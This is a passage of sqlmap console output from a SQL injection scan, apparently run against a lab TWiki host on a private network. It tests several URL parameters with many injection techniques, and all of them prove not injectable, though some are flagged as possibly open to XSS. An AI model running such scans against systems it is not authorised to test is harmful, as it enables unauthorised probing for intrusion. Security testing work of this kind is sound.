[18:31:00] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:31:00] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:31:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:31:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:31:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:31:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:31:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:31:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:31:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:31:05] [INFO] testing 'MySQL inline queries'
[18:31:05] [INFO] testing 'PostgreSQL inline queries'
[18:31:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:31:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:31:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:31:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:31:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:31:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:31:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:31:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:31:09] [INFO] testing 'Oracle AND time-based blind'
[18:31:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:31:10] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:31:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:31:26] [WARNING] GET parameter 'rev1' is not injectable
[18:31:26] [INFO] testing if GET parameter 'rev2' is dynamic
[18:31:26] [WARNING] GET parameter 'rev2' does not appear dynamic
[18:31:26] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:31:27] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:31:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:31:28] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:31:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:31:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:31:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:31:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:31:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:31:31] [INFO] testing 'MySQL inline queries'
[18:31:31] [INFO] testing 'PostgreSQL inline queries'
[18:31:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:31:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:31:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:31:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:31:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:31:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:31:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:31:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:31:35] [INFO] testing 'Oracle AND time-based blind'
[18:31:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:31:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:31:50] [WARNING] GET parameter 'rev2' is not injectable
[18:31:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 28:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?rev=1.1
do you want to test this URL? [Y/n/q]
> Y
[18:31:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebTopicList?rev=1.1'
[18:31:50] [INFO] testing connection to the target URL
[18:31:50] [INFO] testing if the target URL is stable
[18:31:51] [INFO] target URL is stable
[18:31:51] [INFO] testing if GET parameter 'rev' is dynamic
[18:31:51] [WARNING] GET parameter 'rev' does not appear dynamic
[18:31:51] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:31:51] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:31:51] [INFO] testing for SQL injection on GET parameter 'rev'
[18:31:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:31:51] [WARNING] reflective value(s) found and filtering out
[18:31:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:31:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:31:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:31:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:31:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:31:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:31:56] [INFO] testing 'MySQL inline queries'
[18:31:56] [INFO] testing 'PostgreSQL inline queries'
[18:31:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:31:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:31:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:31:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:31:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:31:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:31:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:32:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:32:00] [INFO] testing 'Oracle AND time-based blind'
[18:32:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:01] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:32:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:32:16] [WARNING] GET parameter 'rev' is not injectable
[18:32:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 29:
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebTopicList?template=oopsmore&param1=1.2&param2=1.2
do you want to test this URL? [Y/n/q]
> Y
[18:32:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebTopicList?template=oopsmore&param1=1.2&param2=1.2'
[18:32:16] [INFO] testing connection to the target URL
[18:32:16] [INFO] testing if the target URL is stable
[18:32:17] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:32:17] [INFO] testing if GET parameter 'template' is dynamic
[18:32:17] [INFO] confirming that GET parameter 'template' is dynamic
[18:32:17] [INFO] GET parameter 'template' is dynamic
[18:32:18] [INFO] heuristics detected web page charset 'ascii'
[18:32:18] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:32:18] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:32:18] [INFO] testing for SQL injection on GET parameter 'template'
[18:32:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:32:18] [WARNING] reflective value(s) found and filtering out
[18:32:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:32:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:32:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:32:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:32:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:32:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:32:21] [INFO] testing 'MySQL inline queries'
[18:32:21] [INFO] testing 'PostgreSQL inline queries'
[18:32:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:32:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:32:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:32:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:32:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:32:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:32:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:32:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:32:24] [INFO] testing 'Oracle AND time-based blind'
[18:32:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:32:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:32:36] [WARNING] GET parameter 'template' is not injectable
[18:32:36] [INFO] testing if GET parameter 'param1' is dynamic
[18:32:36] [WARNING] GET parameter 'param1' does not appear dynamic
[18:32:36] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:32:37] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:32:37] [INFO] testing for SQL injection on GET parameter 'param1'
[18:32:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:32:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:32:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:32:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:32:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:32:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:32:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:32:41] [INFO] testing 'MySQL inline queries'
[18:32:41] [INFO] testing 'PostgreSQL inline queries'
[18:32:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:32:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:32:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:32:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:32:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:32:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:32:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:32:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:32:45] [INFO] testing 'Oracle AND time-based blind'
[18:32:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:32:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:33:01] [WARNING] GET parameter 'param1' is not injectable
[18:33:01] [INFO] testing if GET parameter 'param2' is dynamic
[18:33:01] [WARNING] GET parameter 'param2' does not appear dynamic
[18:33:01] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[18:33:02] [INFO] testing for SQL injection on GET parameter 'param2'
[18:33:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:33:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:33:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:33:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:33:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:33:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:33:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:33:06] [INFO] testing 'MySQL inline queries'
[18:33:06] [INFO] testing 'PostgreSQL inline queries'
[18:33:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:33:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:33:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:33:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:33:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:33:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:33:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:33:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:33:10] [INFO] testing 'Oracle AND time-based blind'
[18:33:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:33:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:33:26] [WARNING] GET parameter 'param2' is not injectable
[18:33:26] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 30:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=\.*
do you want to test this URL? [Y/n/q]
> Y
[18:33:26] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=\.*'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:33:26] [INFO] testing connection to the target URL
[18:33:28] [INFO] testing if the target URL is stable
[18:33:29] [INFO] target URL is stable
[18:33:29] [INFO] testing if URI parameter '#1*' is dynamic
[18:33:29] [INFO] confirming that URI parameter '#1*' is dynamic
[18:33:29] [WARNING] URI parameter '#1*' does not appear dynamic
[18:33:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:33:29] [INFO] testing for SQL injection on URI parameter '#1*'
[18:33:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:33:29] [WARNING] reflective value(s) found and filtering out
[18:33:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:33:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:33:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:33:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:33:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:33:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:33:34] [INFO] testing 'MySQL inline queries'
[18:33:34] [INFO] testing 'PostgreSQL inline queries'
[18:33:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:33:35] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:33:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:33:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:33:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:33:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:33:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:33:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:33:39] [INFO] testing 'Oracle AND time-based blind'
[18:33:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:33:39] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:33:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:33:56] [WARNING] URI parameter '#1*' is not injectable
[18:33:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 31:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^a
do you want to test this URL? [Y/n/q]
> Y
[18:33:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^a'
[18:33:56] [INFO] testing connection to the target URL
[18:33:56] [INFO] testing if the target URL is stable
[18:33:57] [INFO] target URL is stable
[18:33:57] [INFO] testing if GET parameter 'scope' is dynamic
[18:33:57] [INFO] confirming that GET parameter 'scope' is dynamic
[18:33:57] [INFO] GET parameter 'scope' is dynamic
[18:33:58] [WARNING] heuristic (basic) test shows that GET parameter 'scope' might not be injectable
[18:33:58] [INFO] testing for SQL injection on GET parameter 'scope'
[18:33:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:34:02] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:34:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:34:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:34:06] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:34:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:34:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:34:10] [INFO] testing 'MySQL inline queries'
[18:34:10] [INFO] testing 'PostgreSQL inline queries'
[18:34:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:34:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:34:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:34:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:34:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:34:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:34:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:34:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:34:22] [INFO] testing 'Oracle AND time-based blind'
[18:34:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:34:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:34:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:35:08] [WARNING] GET parameter 'scope' is not injectable
[18:35:08] [INFO] testing if GET parameter 'regex' is dynamic
[18:35:08] [WARNING] GET parameter 'regex' does not appear dynamic
[18:35:08] [WARNING] heuristic (basic) test shows that GET parameter 'regex' might not be injectable
[18:35:08] [INFO] testing for SQL injection on GET parameter 'regex'
[18:35:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:35:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:35:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:35:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:35:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:35:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:35:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:35:14] [INFO] testing 'MySQL inline queries'
[18:35:14] [INFO] testing 'PostgreSQL inline queries'
[18:35:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:35:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:35:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:35:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:35:16] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:35:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:35:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:35:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:35:19] [INFO] testing 'Oracle AND time-based blind'
[18:35:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:35:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:35:38] [WARNING] GET parameter 'regex' is not injectable
[18:35:38] [INFO] testing if GET parameter 'search' is dynamic
[18:35:38] [INFO] confirming that GET parameter 'search' is dynamic
[18:35:38] [WARNING] GET parameter 'search' does not appear dynamic
[18:35:38] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[18:35:38] [INFO] testing for SQL injection on GET parameter 'search'
[18:35:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:35:38] [WARNING] reflective value(s) found and filtering out
[18:35:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:35:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:35:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:35:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:35:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:35:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:35:42] [INFO] testing 'MySQL inline queries'
[18:35:42] [INFO] testing 'PostgreSQL inline queries'
[18:35:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:35:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:35:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:35:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:35:45] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:35:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:35:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:35:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:35:47] [INFO] testing 'Oracle AND time-based blind'
[18:35:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:35:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:35:59] [WARNING] GET parameter 'search' is not injectable
[18:35:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^b'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^c'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^d'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^e'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^f'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^g'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^h'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^i'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^j'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^k'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^l'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^m'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^n'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^o'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^p'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^q'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^r'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^s'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^t'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^u'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^v'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^w'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^x'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^y'
[18:35:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&search=^z'
URL 32:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&bookview=on&search=\.*
do you want to test this URL? [Y/n/q]
> Y
[18:35:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/?scope=topic&regex=on&bookview=on&search=\.*'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:35:59] [INFO] testing connection to the target URL
[18:36:13] [INFO] testing if the target URL is stable
[18:36:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:36:20] [INFO] testing if URI parameter '#1*' is dynamic
[18:36:21] [INFO] confirming that URI parameter '#1*' is dynamic
[18:36:21] [WARNING] URI parameter '#1*' does not appear dynamic
[18:36:21] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:36:21] [INFO] testing for SQL injection on URI parameter '#1*'
[18:36:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:36:21] [WARNING] reflective value(s) found and filtering out
[18:36:26] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:36:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:36:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:36:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:36:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:36:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:36:29] [INFO] testing 'MySQL inline queries'
[18:36:29] [INFO] testing 'PostgreSQL inline queries'
[18:36:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:36:35] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:36:36] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[18:36:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:36:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:36:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
